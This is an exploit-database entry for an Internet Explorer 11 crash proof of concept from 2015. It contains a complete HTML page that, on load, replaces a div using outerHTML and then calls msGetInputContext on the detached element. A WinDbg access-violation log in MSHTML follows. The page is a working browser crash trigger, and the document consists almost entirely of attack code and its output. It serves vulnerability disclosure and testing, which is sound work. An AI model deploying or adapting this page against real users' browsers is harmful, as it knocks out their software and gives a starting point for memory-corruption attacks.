Microsoft Internet Explorer 11 – Crash (PoC) (2)

  • Author: Pawel Wylecial
    Date: 2015-06-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/37239/
  • <!--
    # Exploit title: Microsoft Internet Explorer 11 Crash PoC
    # Date: 07.06.2015
    # Vulnerable version: 11 (newest at the time 11.0.9600.17801)
    # Tested on: Windows 7/8.1
    # Author: Pawel Wylecial
    # http://howl.overflow.pl @h0wlu
    -->
    <html>
    <head>
    <meta http-equiv="Cache-Control" content="no-cache"/>
    <script>
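    function boom() {
      var divA = document.createElement("div");
      document.body.appendChild(divA);

      try {
        //divA.contentEditable = "true";
        // Assigning outerHTML replaces divA in the document with the text "AAAA";
        // the divA variable still refers to the old, now detached element.
        divA.outerHTML = "AAAA";
        // Last call made on the detached element before the access violation
        // logged below (read at [ecx+8] with ecx=0).
        var context = divA['msGetInputContext']();
      }
      catch (exception) {
        // Script exceptions are deliberately ignored.
      }
    }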
    </script>
    </head>
    <body onload='boom();'>
    </body>
    </html>
    <!--
    (2534.480c): Access violation - code c0000005 (!!! second chance !!!)
    eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98
    eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0 nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
    MSHTML!Tree::ElementNode::GetCElement:
    5f302e86 f7410800001000  test    dword ptr [ecx+8],100000h ds:002b:00000008=????????
    -->